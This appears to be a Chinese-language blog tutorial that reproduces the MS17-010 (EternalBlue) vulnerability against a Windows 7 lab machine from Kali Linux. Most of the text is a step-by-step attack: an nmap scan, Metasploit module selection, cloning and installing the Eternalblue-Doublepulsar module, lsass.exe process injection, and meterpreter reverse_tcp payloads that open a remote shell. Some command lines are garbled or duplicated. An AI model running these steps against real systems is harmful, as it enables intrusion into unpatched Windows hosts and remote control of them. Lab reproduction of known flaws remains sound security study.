漏洞复现:MS17-010
漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口)
2.关闭防火墙
靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9
攻击机:kali linux (X64) ip:192.168.1.101
使用工具:meatsploit,nmap
前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine32环境,并且下载32位操作系统的永恒之蓝漏洞利用脚本。可参考文章后面大佬的博客,也可阅读本文。如果是X64位操作系统则不用安装。
打开nmap进行主机发现,可以扫描到主机的IP地址,端口号,服务器的版本等其他信息
Nmap -A 192.168.1.0/24
msfconsole
search ms17-010
可以看到有这样几种攻击脚本 (第四个脚本文章会详细说明如何安装),exploit开头的是漏洞利用模块,可以用来进行攻击;auxiliary是漏洞辅助模块,可以查询漏洞的详细信息等。
use 3 #使用该模块
show options #显示需要设置的参数
set rhosts 192.168.1.9 #设置靶机的IP地址
show payloads
set payloads windows/x64/meterpreter/reverse_tcp #设置payloads
run #开始进行漏洞利用攻击(输入exploit也可以反弹出交互式shell)
可以看到提示信息,该主机可能存在这个漏洞
search ms17-010 #查询漏洞利用脚本
use 0
set payloads windows/x64/meterpreter/reverse_tcp
show options
set rhosts 192.168.1.9 #靶机的IP地址
run
本次运行的结果如下,可以看到攻击失败,同时给与提示,该模块只能攻击X64位操作系统,说明我们的靶机是X32位
方法一:
apt-get install wine32
在执行exploit时可能会出现 :
it looks like wine32 is missing, you should install it.
multiarch needs to be enabled first. as root, please
execute "dpkg --add-architecture i386 && apt-get update && apt-get install wine32"
按照上面的方法dpkg --add-architecture i386 && apt-get update && apt-get install wine32即可
apt-get install wine32
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
验证是否安装成功
wine --version
wine cmd.exe
用wine32执行cmd.exe
wine cmd.exe
如上图所示,即wine 32 安装成功
方法二:(仅供参考)
使用终端输入下列命令
dpkg --add-architecture i386 #这是让Linux安装32位架构,好兼容32位的程序
执行完毕之后再次执行
apt-get update && apt-get install wine32
apt-get install wine32
dpkg --add-architecture i386 && apt-get update &&
cmdand cmdand> cmd.exe #输入cmd.exe
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
注意事项
64位Linux一般会自带一个Wine,名字是wine64,注意Wine32安装之后的名字是wine而非wine32。(可能有些系统会不同但几率不大)
附上卸载i386的方法
dpkg --remove-architecture i386
可能缺少多架构支持,所以我们安装多架构支持,所以安装win 32
首先下载利用的脚本:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
下载下来之后要记得解压
然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb
cd Eternalblue-Doublepulsar-Metasploit/
cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
如上图所示,脚本下载并复制到SMB目录下成功
msfconsole
search eternalblue #或者search ms17-010
use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE x64
set rhost 192.168.1.9
show options #查看设置的参数
设置payloads,特别注意和之前的payloads不同(去掉中间的X86,否则会失败)
set payload windows/meterpreter/reverse_tcp
exploit #或者run 开始攻击,反弹shell
拓展:
第一种交互式shellpayload设置方法:set payload windows/meterpreter/reverse_tcp (注意:此处的payload里面去掉X86,不然链接不成功)
第二种反弹式shellpayload设置方法:set payload windows/shell/reverse_tcp (注意:此处的payload里面去掉X86,不然链接不成功)
如下图所示,攻击成功,反弹出shell ,可移执行windows 7 的系统命令
查看到靶机的IP地址,还可以执行更多的命令..........
Meterpreter命令详解 - yokan - 博客园 (cnblogs.com)https://www.cnblogs.com/vege/p/12635066.html#:~:text=meterpreter%E7%9A%84%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E7%94%A8%E4%BA%8E%E6%9F%A5%E7%9C%8B%E7%9B%AE%E6%A0%87%E7%B3%BB%E7%BB%9F%E7%9A%84%E4%B8%80%E4%BA%9B%E4%BF%A1%E6%81%AF%E3%80%81%E5%AF%B9%E7%B3%BB%E7%BB%9F%E8%BF%9B%E8%A1%8C%E5%9F%BA%E6%9C%AC%E7%9A%84%E6%93%8D%E4%BD%9C%E7%AD%89%E3%80%82%20migrate,%EF%BC%9A%E4%BD%BF%E7%94%A8migrate%E5%91%BD%E4%BB%A4%E5%8F%AF%E4%BB%A5%E5%B0%86meterpreter%E4%BC%9A%E8%AF%9D%E4%BB%8E%E4%B8%80%E4%B8%AA%E8%BF%9B%E7%A8%8B%E7%A7%BB%E6%A4%8D%E5%88%B0%E5%8F%A6%E4%B8%80%E4%B8%AA%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%86%85%E5%AD%98%E7%A9%BA%E9%97%B4%E4%B8%AD%EF%BC%8C%E8%BF%99%E4%B8%AA%E5%91%BD%E4%BB%A4%E5%9C%A8%E6%B8%97%E9%80%8F%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9D%97%E4%B8%AD%E7%BB%8F%E5%B8%B8%E4%BD%BF%E7%94%A8%E3%80%82%20%E8%AF%95%E6%83%B3%E4%B8%80%E4%B8%8B%EF%BC%8C%E5%A6%82%E6%9E%9C%E6%98%AF%E5%88%A9%E7%94%A8IE%E6%B5%8F%E8%A7%88%E5%99%A8%E6%BC%8F%E6%B4%9E%E8%BF%9B%E8%A1%8C%E6%BA%A2%E5%87%BA%E5%BE%97%E5%88%B0%E7%9A%84meterpreter%E4%BC%9A%E8%AF%9D%EF%BC%8Cmeterpreter%E4%BB%A3%E7%A0%81%E5%AD%98%E5%9C%A8%E4%BA%8EIE%E7%9A%84%E5%86%85%E5%AD%98%E7%A9%BA%E9%97%B4%E4%B8%AD%EF%BC%8C%E5%A6%82%E6%9E%9C%E7%94%A8%E6%88%B7%E5%85%B3%E9%97%AD%E6%B5%8F%E8%A7%88%E5%99%A8%EF%BC%8C%E5%B0%86%E4%BC%9A%E7%BB%88%E6%AD%A2%E4%BC%9A%E8%AF%9D%E8%BF%9E%E6%8E%A5%E3%80%82
参考文章:(112条消息) 利用MS17-010渗透win7(32位)_1stPeak's Blog-CSDN博客_msf永恒之蓝32位https://blog.csdn.net/qq_41617034/article/details/91051614
(112条消息) kali linux安装wine32,永恒之蓝msf下 ms17_010 (64位kali下安装wine32)_我是公务员的博客-CSDN博客https://blog.csdn.net/weixin_35458961/article/details/116933855